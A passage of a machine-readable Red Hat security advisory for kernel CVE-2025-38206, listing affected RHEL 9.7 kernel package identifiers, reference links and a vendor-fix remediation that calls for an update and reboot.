"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38206"
},
{
"category": "external",
"summary": "RHBZ#2376377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070420-CVE-2025-38206-a077@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070420-CVE-2025-38206-a077@gregkh/T"
}
],
"release_date": "2025-07-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T10:50:56+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
